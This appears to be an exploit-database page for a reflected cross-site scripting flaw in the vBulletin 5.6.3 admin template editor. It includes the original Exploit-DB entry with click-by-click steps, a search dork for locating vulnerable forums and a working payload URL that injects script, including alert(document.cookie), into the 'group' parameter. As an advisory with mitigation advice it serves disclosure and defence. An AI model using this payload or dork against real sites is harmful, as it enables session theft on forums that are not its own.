header-logo
Suggest Exploit
vendor:
vBulletin
by:
Vincent666 ibn Winnie
8.8
CVSS
HIGH
Cross Site Scripting
79
CWE
Product Name: vBulletin
Affected Version From: 5.6.3
Affected Version To: 5.6.3
Patch Exists: YES
Related CWE: N/A
CPE: a:vbulletin:vbulletin:5.6.3
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2020

vBulletin 5.6.3 – ‘group’ Cross Site Scripting

An attacker can exploit a Cross Site Scripting vulnerability in vBulletin 5.6.3 by navigating to the Admin CP, clicking on Styles, clicking Style Manager, choosing a theme, and choosing the action 'Add new template'. The attacker can then put a title and template of '1' and click 'Save and Reload'. This will generate a new URL which can be tested with different browsers. If the attacker adds a malicious script to the URL, they can execute a Cross Site Scripting attack.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in the application. Additionally, developers should ensure that output is properly encoded before being sent to the client.
Source

Exploit-DB raw data:

# Exploit Title: vBulletin 5.6.3 - 'group' Cross Site Scripting
# Date: 05.09.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://www.vbulletin.com/en/features/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox & Opera
# Google Dorks: "Powered by vBulletin® Version 5.6.3"
# Blog: https://pentestvincent.blogspot.com/2020/11/vbulletin-563-admin-cp-multiple.html

Go to the "Admin CP" - click on "Styles" - click "Style Manager" -
Choose "Denim" or other theme and choose action "Add new template" and
click "Go".

Put on the title "1" and template "1" and "Save and Reload". Now you
can catch the new URL with HTTP Live Headers or with hands.

So..we have Url :

https://localhost/admincp/template.php?templateid=608&group=&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=168&textareaScrollTop=0

Test it with hands and get cross site scripting. Use for tests
different browsers. I use Mozilla Firefox and Opera.

https://localhost/admincp/template.php?templateid=1&group=""><script>alert("Cross
Site Scripting")</script><script>alert(document.cookie)</script>&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=

Picture:

https://imgur.com/a/b6gH5Fn

Navigation

Suggest Exploit

Services By CQR